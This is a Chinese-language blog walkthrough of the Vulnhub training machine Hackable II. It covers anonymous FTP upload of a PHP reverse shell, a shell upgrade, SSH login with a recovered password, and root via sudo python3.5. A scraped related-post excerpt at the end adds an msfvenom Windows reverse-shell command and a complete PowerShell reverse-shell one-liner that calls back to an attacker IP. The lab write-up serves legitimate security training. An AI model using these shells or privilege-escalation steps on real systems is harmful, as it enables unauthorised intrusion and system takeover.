靶机练习 No.24 Vulnhub靶机hackable-ii ftp匿名访问+上传马+网页运行 反弹shell sudo python3.5提权

最新推荐文章于 2024-06-21 18:13:21 发布
最新推荐文章于 2024-06-21 18:13:21 发布
阅读量2.8k 收藏 4
点赞数 1
分类专栏: 靶机学习 文章标签: 安全 linux web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YouthBelief/article/details/122964886
版权

靶机练习 No.24 Vulnhub靶机hackableII

0x00 环境安装

  • 下载地址

       https://www.vulnhub.com/entry/hackable-ii,711/

  • 名称: hacksudo系列HackDudo

  • 靶场: VulnHub.com

  • 难度: 简单

  • 发布时间: 2021年3月16日

  • 提示信息: 无

  • 目标: 2个flag

  • 环境搭建
    Virtual Box 启动 网卡 配置与kali 同网卡

0x01 信息收集

步骤一:ip探测

nmap -sP 192.168.56.0/24

在这里插入图片描述
192.168.56.115 锁定为

步骤二:端口服务识别

nmap -sC -sV -A -p- 192.168.56.115 -o port.txt

在这里插入图片描述
从nmap 扫描结果看出
21 ftp 可以匿名访问
22 ssh
80 http apache 2.4.18

0x02 漏洞挖掘

思路一:ftp 匿名访问

思路二:80 http服务挖掘

手工+扫描器+目录+源码+功能点

思路三:ssh爆破

测试中收集到的密码 用于爆破

步骤一:ftp匿名访问(成功)

(1) 匿名登录

 ftp 192.168.56.115
 anonymous
 回车
 回车
 ls
 get CALL.html

只有一个CALL.html文件 下载下来看看
在这里插入图片描述

(2)查看内容

在这里插入图片描述
一个html页面内容 先放过

步骤二:80http探测

(1)访问首页

apache 配置页面
在这里插入图片描述

(2)查看源码 有没有隐藏信息

发现提示目录扫描
在这里插入图片描述

(3)目录扫描

python3 dirsearch.py  -u "http://192.168.56.115" -e "*"

在这里插入图片描述

(4)查看files页面

又发现 CALL.html页面
在这里插入图片描述
说明此处为 ftp登录后 的地方
回头看看ftp 是否可以写入文件 可以的话 可以上传马 getshell

步骤三:ftp上传马

(1)查看ftp是否拥有写权限

在这里插入图片描述

(2)上传 kali自带的php反弹shell的马

cd /usr/share/webshells/php/
vim /usr/share/webshells/php/php-reverse-shell.php

修改ip 为靶机可以访问到的 kali ip
在这里插入图片描述
在这里插入图片描述

(3)kali开启监听,并运行马 在这里插入图片描述

网页访问文件
在这里插入图片描述

(4)反弹shell(成功)

只有www-data权限
在这里插入图片描述

步骤四:切换为完整终端(成功)

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl+Z
stty -a
stty raw -echo;fg
reset

在这里插入图片描述

步骤五:www-data 权限信息收集

(1)cat /etc/passwd

在这里插入图片描述

(2)/home目录下信息收集

/home 目录下存在 important.txt文件 有 读权限
读取 提示 运行 /.runme.sh 脚本
运行后
显示 密钥被破坏了
重启电脑在3秒后
重启电脑在2秒后
重启电脑在1秒后
在这里插入图片描述
密钥解密 得
onion
在这里插入图片描述

(3)/home/shrek 目录下信息收集

大多没有读权限
在这里插入图片描述

步骤六:ssh登录shrek用户(登录成功)

(1)尝试用收集到的密码登录shrek用户(成功)

在这里插入图片描述

(2)查看user.txt

在这里插入图片描述

0x03 提权

3.1 sudo 查看

(1)sudo -l

在这里插入图片描述
(root)NOPASSWD: /usr/bin/python3.5
发现 python3.5

(2)python3.5 提权(成功)

sudo python3.5 -c 'import os;os.system("/bin/sh")'

在这里插入图片描述

(3)查看root.txt

在这里插入图片描述

0x04 总结

(1)nmap 扫出 ftp匿名访问 anonymous登录成功存在读写权限

(2)目录扫描扫出files目录 发现也是ftp登陆后的目录。

(3)ftp 上传kali的php 反弹shell马,网页运行。

(4)反弹shell成功后,收集到一处MD5解密,解密出onion。

(5)ssh登录shrek用户成功。

(6)sudo -l 发现 不用密码就可以以root权限执行 python3.5

(7)sudo python3.5 -c 'import os;os.system("/bin/sh")'切换root终端成功.

Vulnhub靶场案例渗透[8]- HackableII
qq_45776114的博客
11-13 1136
端口,分别对应http服务和ssh服务和ftp服务,以及http后台使用的PHP作为后台语言,并且ftp支持匿名登录。探测端口开放和对应开放端口服务识别,一般使用nmap进行,因为nmap指纹识别比较准确,并且指纹库也比较全。一般从网上下载的文件,可以使用检验下载文件的检验码,防止下载的文件被篡改或者部分缺失.执行python代码之后,成功获取到root的限,以及root下面的flag内容。遍历目录文件,发现可以执行成功,接下来利用一句话木,进行反弹shell。文件进行了示,下图就是示文件内容。
Vulnhub靶场案例渗透[9]- HackableIII
qq_45776114的博客
11-13 1699
多次敲门之后发现,靶机端口一直不开放,最后登录靶机之后,发现靶机的knockd服务挂了,需要修改。探测端口开放和对应开放端口服务识别,一般使用nmap进行,因为nmap指纹识别比较准确,并且指纹库也比较全。lxd,就是利用lxd创建一个容器,然后把宿主机的磁盘挂载到容器内部,然后用容器的限去操作宿主机磁盘内容从而。一般从网上下载的文件,可以使用检验下载文件的检验码,防止下载的文件被篡改或者部分缺失,对应文件的校验码官方网址会供。修复完这些问题之后,重新进行敲门,发现靶机22端口开放了。
ftp命令
jihaichen的博客
05-06 2079
ftp命令与教程假设我们已经有一个FTP服务器,上面有一个我们配置好的木文件mhgz.exe,我们应该知道FTP服务器的三个参数:1、FTP服务器的IP地址:如1.1.1.12、FTP服务器的用户名:如test3FTP服务器的密 码:如test123在远程计算机的C***下依次输入下面的命令:1、echo open 221.202.50.125>>test.txt 登陆FTP...
靶机知识点之ftp匿名登陆
不想当脚本小子的脚本小子
05-06 470
因为想做红队 所以我打算靶机方面都要做到最后一步限维,促进学习; 很久没有玩vulnhub靶机了,过来打一打; 先探测一下靶机的ip:思路——21端口ftp暴力破解 22端口远程登陆 80端口寻找功能点 主页为一张图片 信息收集一下 感觉是拿用户名和密码然后ssh登陆找flag,但是似乎目前并没有搜集到什么有用的信息 但是ftp这里我还没有做什么工作 查了一下 发现他允许匿名登陆 去搜了一下相关的知识点(利用nmap -A -v参数即可得到目标具体信息) ...
关于匿名用户能拥有所有ftp上面文件夹的所有操作的配置
yes_is_ok的博客
03-01 2529
1、打开配置文件:#vi /etc/vsftpd/vsftpd.confanonymous_enable=YESwrite_enable=YESlocal_umask=022anon_upload_enable=YES #容许匿名用户上传文件anon_mkdir_write_enable=YES #容许匿名用户建立目录anon_other_write_enable=YES ...
[Vulnhub] Troll FTP匿名登录+定时任务
06-21 320
#FTP匿名登录 #定时任务
文件服务器匿名账户,ftp服务器匿名用户
weixin_42537142的博客
08-06 847
ftp服务器匿名用户限 内容精选换一换请根据表1参考对应文档进行升级操作。CANN软件升级操作如下:chmod +x软件包名.run./软件包名.run --check若用户安装软件包时指定路径,请执行以下命令。./软件包名.run --upgrade --install-path=其中为用户指定的软件包安装目录,软件包名请根据实际包名进行替换。若用户OBS可以通过IAM获取临时访问密钥(临时A...
vulnhub -digitalworld.local: JOY (考点:ftp&ProFTPD漏洞/ linux知识)
冬萍子癸水
04-24 1368
https://www.vulnhub.com/entry/digitalworldlocal-joy,298/ nat网络 arp-scan -l 比平常多出来的ip就是靶机了 nmap 很多端口,25和110想到smtp枚举邮件用户,和邮件查看。22想到ssh登录139 445想到smb查看敏感文件,21想到ftp查看敏感文件。 PORT STATE SERVICE VER...
Vulnhub靶机hackable3
qq_48904485的博客
02-12 1095
运行环境:Virtualbox攻击机:kali(10.0.2.15靶机hackable3(10.0.2.53)目标:获取靶机root限和flag靶机下载地址:https://www.vulnhub.com/entry/hackable-iii,720/
vulnhub--Hackable: II
venu_s的博客
06-30 359
靶机介绍 difficult:easy download:https://www.vulnhub.com/entry/hackable-ii,711/ 信息探测 还是常规的进行主机发现、端口扫描和目录扫描,尽可能的收集信息 主机发现 端口扫描 开放了21,22,80端口,其中21端口可以使用anonymous身份进行登录 目录扫描 有一个/files目录 访问80端口,是一个Apache的默认页面 查看网页源代码,示进行目录扫描,已经扫描过了 访问/files,有一个CALL.html文件 内容
Hackable II靶机
logan_logan的博客
07-17 478
1.使用nmap端口扫描 端口扫描时发现开启了ftp服务,并且可以匿名登录; 2.匿名登录FTP服务 经过测试,可以上传和下载文件; 3.使用nikto工具进行扫描 得到了一个/files目录,在网页打开; 4.网页打开files这个目录; 在网页打开之后发现与之前FTP登录时看到的文件一致, 5.上传PHP文件,反弹shell 在kali里面使用nc监听端口,成功获取shell; 6.切换到home目录下找到一个important.txt文件 查看之后示我们运行runme.sh文件; 7.
FTP教程FTP教程
05-17
FTP教程FTP教程FTP教程
1433和135合集。ftp工具
12-27
1433和135合集。ftp工具,服务器专用。为了让被人不能用你的工具。我都是加了密码的。密码在压缩包里面。
靶机练习 No.20 Vulnhub靶机 jangow 01 ftp登录 命令执行写入webshell php反弹shell 45010.c内核漏洞
YouthBelief的博客
01-20 3191
0x00 环境准备 下载链接 https://download.vulnhub.com/jangow/jangow-01-1.0.1.ova 靶机介绍 难度:简单 上架时间:2021年11月4日 示信息:The secret to this box is enumeration! Inquiries jangow2021@gmail.com 靶机配置 virtual box 启动,与kali配置同一网卡。 0x01 信息收集 靶机ip探测 端口服务识别 21/tcp ope
匿名登录FTP服务器扫描文件列表python程序
ming2008tian的博客
09-26 1495
最近在Freebuf上看到有个人扫描了全球的ip地址,扫描出近80万可匿名登录的FTP服务器,下载下来后用python写了一个扫描文件列表的程序,不过效率比较慢,只当学习一下,没准会找到比较有意思的东西呢。 代码如下:import ftplib import threading import time import socket def anonyLogin(ftpUrl,FileDest):
centos云服务器安装cs(cobaltstrike4
2401_84253380的博客
04-26 465
wget https://repo.huaweicloud.com/java/jdk/8u201-b09/jdk-8u201-linux-x64.tar.gz #下载jdk压缩包tar -zxvf jdk-8u201-linux-x64.tar.gz #解压解压完之后生成一个jdk1.8.0_201文件mv jdk1.8.0_201 /usr/local/jdk1.8/ #把jdk1.8.0_201文件移动到usr/local/jdk1.8/目录下配置环境变量。
Vulnhub】Five86-2
4ut15m's blog
02-12 851
Description Five86-2 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. The ultimate goal of this challenge is to get root and to re...
反弹shell方法汇总
2301_76786857的博客
01-10 2607
reverse shell反弹shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。
vulnhub 靶机 Earth
qq_44029310的博客
06-12 1419
一次打靶记录。
windows靶机反弹shell
最新发布
02-19
### Windows 靶机反弹 Shell方法 #### 一、使用 Metasploit 实现反弹 Shell 为了创建一个可以用于反弹 Shell 的 payload 文件,可以通过 `msfvenom` 工具来完成。对于 Windows 系统而言,假设目标机器支持 x64 架构,则可采用如下命令生成 HTA 格式的 Payload: ```bash msfvenom -p windows/x64/shell_reverse_tcp LHOST=<vps_ip> LPORT=9090 -f hta-psh -o 1.hta ``` 此操作将会把生成的恶意文件保存为名为 "1.hta" 的文件[^3]。 当受害者访问这个 .hta 文件时,它会在受害者的计算机上执行并尝试连接到指定 IP 地址和端口上的监听器,从而建立反向 Shell 连接。 #### 二、通过 Netcat (nc) 创建简单 TCP 反弹 Shell 另一种较为基础的方式是在攻击者控制下的设备上启动监听服务,并让目标主机发送回连接请求。具体做法如下所示: - 攻击方设置好监听状态:`nc -lvp 4444` - 被控端执行相应指令以发起连接:`powershell.exe -c "$client = New-Object System.Net.Sockets.TCPClient(&#39;192.168.41.142&#39;,4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1 | Out-String );$sendback2 = $sendback + &#39;PS &#39; + (pwd).Path + &#39;> &#39;;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"` 上述 PowerShell 命令能够供更稳定的交互环境给攻击者[^2]。 #### 三、关于过程中的注意事项 一旦获得了初始级别的 Shell 访问限之后,下一步通常是试图升至更高层次的操作系统特级别。然而,在实际操作中需要注意以下几个方面的问题: - **网络配置**:确认攻击机与靶机处于相同网段内; - **架构匹配度**:确保所使用的 exploit 或 payload 符合目标系统的 CPU 类型(即 32-bit vs 64-bit),这可通过运行 `systeminfo` 来获取信息; - **持续性维护会话**:在整个渗透测试期间维持稳定的目标系统在线状况; - **漏洞适用范围**:考虑到某些安全更新可能已经修复了特定类型的弱点,因此应当针对未修补版本实施攻击策略; 最后一步是验证是否成功升了限等级,通常情况下可以借助于调用 `whoami` 或类似的内置工具来进行检查。如果显示的结果表明当前是以管理员身份登录的话,则说明操作顺利完成[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值